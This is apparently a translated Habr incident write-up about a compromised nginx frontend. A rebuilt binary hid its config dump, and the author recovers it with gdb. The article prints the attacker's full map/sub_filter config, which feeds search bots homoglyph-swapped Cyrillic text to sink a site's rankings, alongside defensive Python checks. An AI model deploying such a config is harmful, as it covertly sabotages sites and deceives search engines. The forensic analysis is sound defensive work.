When 'a' is not equal to 'a'. In the wake of a hack

An unpleasant story happened to a friend of mine. But as unpleasant as it was for Mikhail, it was just as entertaining for me.

I should say that my friend is quite a capable UNIX user: he can install the system, MySQL and PHP himself and do simple nginx configuration.
He also has a dozen or a dozen and a half websites devoted to construction tools.

One of these sites, devoted to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review site, but someone got into the habit of attacking it. Sometimes it is a DDoS, sometimes brute force, sometimes obscene comments and abuse complaints sent to the hosting provider and to RKN.
Suddenly everything went quiet, and this calm turned out not to be a good one: the site began to slide gradually out of the top lines of the search results.


That was the preamble; what follows is the admin's own story.

It was getting close to bedtime when the phone rang: "San, would you take a look at my server? It seems to me that I've been hacked. I can't prove it, but the feeling hasn't left me for three weeks now. Maybe it's just time for me to get treated for paranoia?"

What followed was a half-hour discussion that can be summarized as follows:

  • the ground for a break-in was quite fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if it happened) was aimed specifically at this site;
  • the problem areas have been fixed, and what remains is to find out whether there was any intrusion;
  • the break-in could not have affected the site's code and databases.

Regarding the last point.


Only the public ("white") IP of the frontend faces the outside world. There is no exchange between the backends and the frontend other than http(s), the users/passwords are different, and no keys were exchanged. On the private ("grey") addresses, all ports except 80/443 are closed. The public IPs of the backends are known to only two users, whom Mikhail trusts completely.

Debian 9 is installed on the frontend, and by the time of the call the system had been isolated from the world by an external firewall and stopped.

"OK, give me access," I said, deciding to put off sleep for an hour. "I'll take a look with my own eyes."

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Checking for a possible break-in

I boot the server, at first in rescue mode. I mount the disks and page through the auth logs, the history, the system logs and so on. Where possible I check file creation dates, although I understand that a normal intruder would have "swept up" after himself, and Misha had already "trampled" the scene while he was searching on his own.

I then boot normally and, not yet really understanding what to look for, study the configs. First of all I am interested in nginx since, by and large, there is nothing on the frontend apart from it.
The configs are small and well structured into a dozen files; I simply go through them with cat, one by one. Everything looks clean, but you never know whether I have missed some include, so let me dump the full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I didn't get it: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joins the one about the listing: "Why such an old version of nginx?"

On top of that, the system believes that a newer version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Hang on, I don't even know how to do that!
- OK, go to sleep then...

Nginx has clearly been rebuilt, and the listing output of "-T" is hidden for a reason. There is no longer any doubt about the break-in; one could simply accept it and (since Misha has replaced the server with a new one anyway) consider the problem solved.
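
An added example, not from the original article: the mismatch found above, between the version the binary reports and the version in the package database, turned into a repeatable check. The first two inputs are the outputs shown on this page; the `dpkg --verify` sample and all function names are constructed for illustration.

```python
import re

def binary_version(nginx_v_output):
    """Pull the upstream version out of `nginx -v` output."""
    m = re.search(r"nginx/(\d+(?:\.\d+)+)", nginx_v_output)
    if m is None:
        raise ValueError("no nginx version string found")
    return m.group(1)

def package_version(dpkg_l_line):
    """Upstream version from an 'ii' line of `dpkg -l` (no epoch, no revision)."""
    fields = dpkg_l_line.split()
    if len(fields) < 3 or fields[0] != "ii":
        raise ValueError("not an installed-package line")
    version = fields[2].split(":", 1)[-1]   # drop the epoch, if any
    return version.rsplit("-", 1)[0]        # drop the Debian revision

def changed_files(verify_output):
    """Non-conffile paths whose content differs, from `dpkg --verify` output.

    Line format: nine result characters, space, attribute ('c' = conffile),
    space, path. A '5' in the third position means the MD5 check failed.
    """
    paths = []
    for line in verify_output.splitlines():
        m = re.match(r"^(.{9}) (.) (.+)$", line)
        if m and m.group(1)[2] == "5" and m.group(2) != "c":
            paths.append(m.group(3))
    return paths

def audit(nginx_v_output, dpkg_l_line, verify_output=""):
    """Return a list of human-readable findings; empty means nothing odd."""
    findings = []
    running, packaged = binary_version(nginx_v_output), package_version(dpkg_l_line)
    if running != packaged:
        findings.append(f"binary reports {running}, package database says {packaged}")
    findings += [f"content differs from package: {p}" for p in changed_files(verify_output)]
    return findings

# NGINX_V and DPKG_L are copied from this page; VERIFY is a constructed sample.
NGINX_V = "nginx version: nginx/1.10.3"
DPKG_L = "ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server"
VERIFY = "??5?????? c /etc/nginx/nginx.conf\n??5??????   /usr/sbin/nginx"

if __name__ == "__main__":
    for finding in audit(NGINX_V, DPKG_L, VERIFY):
        print(finding)
```

Once root may have been compromised, the package database on the host is no more trustworthy than the binary, so a comparison like this belongs on rescue media or against a freshly downloaded package.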

And indeed, since someone had obtained root rights, the only sensible thing to do is reinstall the system, and searching for what went wrong there is pointless. But this time curiosity beat sleep. How do we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

We look, and the trace is clearly missing lines a la

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "\n", 1

For the sake of interest, let's compare the results.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that this part of the code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was changed to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

which is why the "-T" listing is not shown.

But how do we view the config?

If my assumption is correct and the problem is only in the variable ngx_dump_config, let's try to set it using gdb. Fortunately the --with-cc-opt -g switch is present, and let's hope the -O2 optimization won't hurt us. At the same time, since I don't know how ngx_dump_config might be handled in case 'T':, we won't invoke that block but will set the variable while going through case 't':

Why '-t' can be used just as well as '-T'

The if (ngx_dump_config) block is processed inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was changed in this part rather than in case 'T':, my method will not work.

Test nginx.conf

With the problem already solved, it was established experimentally that the malware only needs a minimal nginx configuration of this form to work:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We'll use it in this article for brevity.

Starting the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint in the main() function
  • start the program
  • change the value of the variable that controls config output: ngx_dump_config=1
  • continue/finish the program

As we can see, the real config differs from ours; let's pull the parasitic piece out of it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's go through what is happening here in order.

The yandex/google User-Agents are identified:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who meet both of the conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of HTML pages, Cyrillic 'о' is replaced with Latin 'o' and Cyrillic 'а' with Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's right, the whole trick is that 'а' != 'a', just as 'о' != 'o' (Cyrillic on the left, Latin on the right).


As a result, the search engine bots receive, instead of pure 100% Cyrillic text, modified garbage diluted with Latin 'a' and 'o'. I won't venture to discuss how this affects SEO, but such a letter mishmash is unlikely to have a positive effect on positions in the search results.

What can I say, the guys have imagination.
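
An added example, not part of the original article: one way to spot this substitution from the outside is to fetch the same page once with a browser User-Agent and once with a crawler User-Agent, then look for words that mix Cyrillic and Latin letters. The two bodies below are constructed (the crawler copy is made by applying the same 'о' and 'а' replacement the config performs), and the function names and look-alike table are assumptions of this example.

```python
import re
import unicodedata

# Cyrillic letters (keys) and their Latin look-alikes. The config on this page
# swaps only U+043E and U+0430; the rest are other common confusables.
LOOKALIKES = {"\u0430": "a", "\u043e": "o", "\u0435": "e", "\u0440": "p",
              "\u0441": "c", "\u0445": "x", "\u0443": "y"}

def script_of(ch):
    """Return 'Cyrillic' or 'Latin' for letters of those scripts, else None."""
    name = unicodedata.name(ch, "")
    for script in ("CYRILLIC", "LATIN"):
        if name.startswith(script):
            return script.capitalize()
    return None

def mixed_script_words(text):
    """Words containing both Cyrillic and Latin letters, in order of appearance."""
    hits = []
    for word in re.findall(r"[^\W\d_]+", text):
        if {script_of(c) for c in word} >= {"Cyrillic", "Latin"}:
            hits.append(word)
    return hits

def substitutions(browser_body, crawler_body):
    """(offset, original, served) where the crawler copy got a Latin look-alike."""
    return [(i, f"U+{ord(b):04X}", f"U+{ord(c):04X}")
            for i, (b, c) in enumerate(zip(browser_body, crawler_body))
            if b != c and LOOKALIKES.get(b) == c]

# Constructed sample: "<p>Бензопила: обзор</p>", written with escapes so the
# code points are unambiguous.
BROWSER_BODY = ("<p>\u0411\u0435\u043d\u0437\u043e\u043f\u0438\u043b\u0430: "
                "\u043e\u0431\u0437\u043e\u0440</p>")
# What the tampered frontend would serve to a crawler: 'о'/'а' swapped for Latin.
CRAWLER_BODY = BROWSER_BODY.translate(str.maketrans({"\u043e": "o", "\u0430": "a"}))

if __name__ == "__main__":
    print(mixed_script_words(BROWSER_BODY))   # clean copy
    print(mixed_script_words(CRAWLER_BODY))   # tampered copy
    for hit in substitutions(BROWSER_BODY, CRAWLER_BODY):
        print(hit)
```

The mixed-script check needs no clean baseline, so it can also be run over a single fetched page; the position diff is only meaningful when both copies are the same length, which holds for one-to-one letter replacement.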

Links

Debugging with GDB
gdb(1) - Linux man page
strace(1) - Linux man page
Nginx - Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.habr.com
